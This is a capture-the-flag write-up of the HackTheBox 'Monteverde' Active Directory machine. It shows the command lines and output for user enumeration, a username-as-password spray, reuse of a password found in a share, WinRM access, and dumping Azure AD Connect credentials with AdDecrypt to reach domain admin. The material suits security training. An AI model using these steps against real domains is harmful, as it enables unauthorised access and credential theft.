Monteverde

AD box on HTB.

Enumeration:

Port Scanning:

As always we are going to start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]       
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.228.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 00:58 EDT
Nmap scan report for 10.129.228.111                                                                                                                                        
Host is up, received echo-reply ttl 127 (0.12s latency).                                                                                                                   
Scanned at 2025-09-06 00:58:11 EDT for 236s                                                                                                                                
Not shown: 65517 filtered tcp ports (no-response)                                                                                                                          
PORT      STATE SERVICE       REASON          VERSION                                                                                                                      
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                              
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 04:59:10Z)                                                               
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 1s

<snipped>

So we have another active directory box.

I will add the domain and hostname to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ cat /etc/hosts   
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.228.111 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE

I am going to enumerate shares and users with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u '' -p '' --users         
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.129.228.111  445    MONTEVERDE       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.228.111  445    MONTEVERDE       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.228.111  445    MONTEVERDE       AAD_987d7f2f57d2              2020-01-02 22:53:24 0       Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB         10.129.228.111  445    MONTEVERDE       mhope                         2020-01-02 23:40:05 0        
SMB         10.129.228.111  445    MONTEVERDE       SABatchJobs                   2020-01-03 12:48:46 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-ata                       2020-01-03 12:58:31 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-bexec                     2020-01-03 12:59:55 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-netapp                    2020-01-03 13:01:42 0        
SMB         10.129.228.111  445    MONTEVERDE       dgalanos                      2020-01-03 13:06:10 0        
SMB         10.129.228.111  445    MONTEVERDE       roleary                       2020-01-03 13:08:05 0        
SMB         10.129.228.111  445    MONTEVERDE       smorgan                       2020-01-03 13:09:21 0        
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated 10 local users: MEGABANK

No I do not have permissions to enumerate shares.

Username as the Password:

Now I will save those users to a file, and attempt multiple attacks on them, for example use the username as the password:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:svc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURE

Now we have valid credentials sabatchjobs:SABatchJobs.

I did not find anything useful on BloodHound data.

Lets try now to enumerate the shares:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u sabatchjobs -p SABatchJobs --shares                         
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\sabatchjobs:SABatchJobs 
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB         10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB         10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB         10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.129.228.111  445    MONTEVERDE       azure_uploads   READ            
SMB         10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.129.228.111  445    MONTEVERDE       users$          READ

We have three not default shares: azure_uploads, E$, users$, but we have read access only on azure_uploads, and users$.

Shell as mhope:

I will use smbclient to interact with those shares:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]                  
└─$ smbclient //10.129.228.111/azure_uploads -U 'megabank.local/sabatchjobs%SABatchJobs'
Try "help" to get a list of possible commands.                            
smb: \> dir
  .                                   D        0  Fri Jan  3 07:43:06 2020
  ..                                  D        0  Fri Jan  3 07:43:06 2020
                                          
                31999 blocks of size 4096. 28979 blocks available
smb: \> exit                                                                                                                                                               
                                          
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ smbclient //10.129.228.111/users$ -U 'megabank.local/sabatchjobs%SABatchJobs'        
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020
                                          
                31999 blocks of size 4096. 28979 blocks available
smb: \> prompt off                                                                   
smb: \> recurse on      
smb: \> mget *                                                                       
getting file \mhope\azure.xml of size 1212 as mhope/azure.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \> exit

We have azure.xml file into mhope directory.

Lets see what it contains:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ cat mhope/azure.xml                                                              
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y********</S>
    </Props>
  </Obj>
</Objs>

So we have another password in mhope directory, maybe it is for him, but we can also try to spray it on the users we have enumerated earlier:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p passwords.txt --continue-on-success            
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y******** 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:4n0therD4y******** STATUS_LOGON_FAILURE

Indeed it is for mhope domain user.

We can use netexec to check for other services, and we found previously that WinRM is open, lets try it out:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec winrm monteverde.megabank.local -u mhope -p '4n0therD4y********' 
WINRM       10.129.228.111  5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.228.111  5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y******** (Pwn3d!)

We can see the Pwn3d!, which implies that we can authenticate to the machine since we are member of Remote Management Users.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y********'
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                            
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                       
                                                                                                                                                                           
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\mhope\Documents>

Privilege Escalation:

Lets check our who we are:

*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all                                                                                                    01:21:52 [173/193]
                                                                                                                                                                           
<snipped>                                                                                                                                                    
                                                                                                                                                                           
Group Name                                  Type             SID                                          Attributes                                                       
=========================================== ================ ============================================ ==================================================               
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group               
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group               
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group               
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group               
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group               
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                                                                   

<snipped>

We will see that we are member of Azure Admins, which is odd, also I found there was .Azure folder on mhope directory:

*Evil-WinRM* PS C:\Users\mhope\.Azure> dir


    Directory: C:\Users\mhope\.Azure


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat

If we check for installed applications on that system:

*Evil-WinRM* PS C:\Users\mhope\.Azure> Get-Package | Select-Object Name, Version                                                                                           
                                                                                                                                                                           
Warning: MSG:UnableToDownload «https://go.microsoft.com/fwlink/?LinkID=627338&clcid=0x409» «»                                                                              
Warning: Unable to download the list of available providers. Check your internet connection.                                                                               
                                                                                                                                                                           
Name                                                                    Version                                                                                            
----                                                                    -------                                                                                            
GDR 2027 for SQL Server 2017 (KB4505224) (64-bit)                       14.0.2027.2                                                                                        
Microsoft SQL Server 2017 (64-bit)                                                                                                                                         
Microsoft Help Viewer 2.3                                               2.3.28107                                                                                          
Microsoft Help Viewer 2.3                                               2.3.28107                                                                                          
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810           14.12.25810.0                                                                                      
Microsoft Azure AD Connect Health agent for sync                        3.1.7.0                                                                                            
Microsoft Azure AD Connect Health agent for sync                        3.1.7.0                                                                                            
Microsoft SQL Server Management Studio - 18.4                           15.0.18206.0                                                                                       
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005            12.0.21005.1                                                                                       
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810           14.12.25810.0                                                                                      
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501            12.0.30501.0                                                                                       
Microsoft Visual Studio Tools for Applications 2017                     15.0.27520                                                                                         
SQL Server 2017 Shared Management Objects Extensions                    14.0.1000.169                                                                                      
Microsoft Azure AD Connect                                              1.1.882.0                                                                                          
SQL Server 2017 Common Files                                            14.0.1000.169
SQL Server 2017 Batch Parser                                            14.0.1000.169                                                                               [0/193]
Microsoft ODBC Driver 17 for SQL Server                                 17.4.1.1
Microsoft Azure AD Connect synchronization services                     1.1.882.0
Microsoft Analysis Services OLE DB Provider                             15.0.2000.20
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810          14.12.25810
VMware Tools                                                            10.3.2.9925305
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005              12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005           12.0.21005
Microsoft SQL Server 2017 Setup (English)                               14.0.2027.2
Microsoft SQL Server 2012 Command Line Utilities                        11.4.7001.0
SQL Server 2017 DMF                                                     14.0.1000.169 
Microsoft SQL Server 2017 T-SQL Language Service                        14.0.1000.169 
SQL Server 2017 Shared Management Objects                               14.0.1000.169 
SQL Server 2017 Database Engine Shared                                  14.0.1000.169 
SQL Server Management Studio                                            15.0.18206.0
SQL Server 2017 Connection Info                                         14.0.1000.169 
SQL Server 2017 SQL Diagnostics                                         14.0.1000.169 
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005           12.0.21005
Browser for SQL Server 2017                                             14.0.1000.169 
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005              12.0.21005
Microsoft SQL Server 2012 Native Client                                 11.4.7462.6
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810          14.12.25810
SSMS Post Install Tasks                                                 15.0.18206.0
SQL Server Management Studio for Reporting Services                     15.0.18206.0
Microsoft VSS Writer for SQL Server 2017                                14.0.1000.169 
Microsoft SQL Server 2017 RsFx Driver                                   14.0.2027.2
SQL Server 2017 Database Engine Services                                14.0.1000.169 
Microsoft OLE DB Driver for SQL Server                                  18.2.3.0
Visual Studio 2017 Isolated Shell for SSMS                              15.0.28307.421
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.12.25810             14.12.25810
Microsoft ODBC Driver 13 for SQL Server                                 14.0.2027.2
SQL Server 2017 XEvent                                                  14.0.1000.169 
Integration Services                                                    15.0.1900.63
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810             14.12.25810
Microsoft Visual Studio Tools for Applications 2017 x64 Hosting Support 15.0.27520
SQL Server Management Studio for Analysis Services                      15.0.18206.0
Microsoft Visual Studio Tools for Applications 2017 x86 Hosting Support 15.0.27520
Active Directory Authentication Library for SQL Server                  15.0.1300.359 
Az.Accounts                                                             1.6.6
Az.Resources                                                            1.9.0

*Evil-WinRM* PS C:\Program Files> dir


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
d-----         1/2/2020   2:32 PM                Microsoft.NET
d-----         1/3/2020   5:28 AM                PackageManagement
d-----         1/2/2020   9:37 PM                VMware
d-r---         1/2/2020   2:46 PM                Windows Defender
d-----         1/2/2020   2:46 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----         1/2/2020   2:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         1/2/2020   2:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----         1/3/2020   5:28 AM                WindowsPowerShell

We will find Microsoft Azure AD Connect which is not installed by default on an active directory machine.

When you play CTF machine and find non-default application installed on that system, it is probably the way to escalate your privileges.

I searched online for how can I abuse this:

And found this medium article stated that we can dump credentials:

He mentioned in the references Vbscrub binary that can dump credentials, lets search for it:

As he stated:

The Azure AD Connect service is essentially responsible for synchronizing things between your local AD domain, and the Azure based domain. However, to do this it needs privileged credentials for your local domain so that it can perform various operations such as syncing passwords etc.

And he provided us with a binary that we can use to abuse this feature:

Releases · VbScrub/AdSyncDecryptGitHub

What this script will do:

It will connect to the mssql database.
It will pull those values instance_id, keyset_id, entropy from mms_server_configuration, because those values will be needed further for decryption.
From mms_management_agent, it will grab private_configuration_xml which contains the username, and encrypted_configuration that contians the encrypted password.
It will try to decrypt the password, and finally print the result to the terminal.

I will download it and unzip it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
--2025-09-06 01:44:25--  https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Resolving github.com (github.com)... 20.233.83.145
Connecting to github.com (github.com)|20.233.83.145|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://release-assets.githubusercontent.com/github-production-release-asset/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-06T06%3A40%3A58Z&rscd=attachment%3B+filename%3DAdDecrypt.zip&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-06T05%3A40%3A09Z&ske=2025-09-06T06%3A40%3A58Z&sks=b&skv=2018-11-09&sig=gk8Bqj0Sf2f799WNgW9Y%2FhSRfU6rUC0sCRVhuQOBJgk%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzEzNzc3NiwibmJmIjoxNzU3MTM3NDc2LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.3OdMtpJNqmtTlL-0XMiYwXbDudv4WHWNlHQq0AEuhSM&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream [following]
--2025-09-06 01:44:36--  https://release-assets.githubusercontent.com/github-production-release-asset/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-06T06%3A40%3A58Z&rscd=attachment%3B+filename%3DAdDecrypt.zip&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-06T05%3A40%3A09Z&ske=2025-09-06T06%3A40%3A58Z&sks=b&skv=2018-11-09&sig=gk8Bqj0Sf2f799WNgW9Y%2FhSRfU6rUC0sCRVhuQOBJgk%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzEzNzc3NiwibmJmIjoxNzU3MTM3NDc2LCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.3OdMtpJNqmtTlL-0XMiYwXbDudv4WHWNlHQq0AEuhSM&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream
Resolving release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
Connecting to release-assets.githubusercontent.com (release-assets.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 152818 (149K) [application/octet-stream]
Saving to: ‘AdDecrypt.zip’

AdDecrypt.zip                              100%[=======================================================================================>] 149.24K  --.-KB/s    in 0.1s    

2025-09-06 01:44:41 (1.37 MB/s) - ‘AdDecrypt.zip’ saved [152818/152818]

                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ unzip AdDecrypt.zip                                             
Archive:  AdDecrypt.zip
  inflating: AdDecrypt.exe           
  inflating: mcrypt.dll

As he mentioned we need to upload both the binary and the dll files to the target machine:

*Evil-WinRM* PS C:\Users\mhope\Downloads> upload AdDecrypt.exe
                                        
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/AdDecrypt.exe to C:\Users\mhope\Downloads\AdDecrypt.exe
                                        
Data: 19796 bytes of 19796 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload mcrypt.dll
                                        
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/mcrypt.dll to C:\Users\mhope\Downloads\mcrypt.dll
                                        
Data: 445664 bytes of 445664 bytes copied
                                        
Info: Upload successful!

Then from within the Bin directory in Microsoft Azure AD Sync as our path we will run the binary with -FullSQL to use the windows authentication:

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Downloads\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4d********
Domain: MEGABANK.LOCAL

Here we have the domain admin password.

We can use psexec or evil-winrm to authenticate as the administrator:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4d********'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
MONTEVERDE
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::f433:f605:ad5e:6417
   Link-local IPv6 Address . . . . . : fe80::f433:f605:ad5e:6417%7
   IPv4 Address. . . . . . . . . . . : 10.129.228.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
                                       10.129.0.1

And we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
c9b74e25a48019a5****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
ea69e095a08222ec****************

PreviousSauna NextTimelapse

Last updated 5 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagUsername as the Password:

hashtagShell as mhope:

hashtagPrivilege Escalation:

Enumeration:

Port Scanning:

Username as the Password:

Shell as mhope:

Privilege Escalation: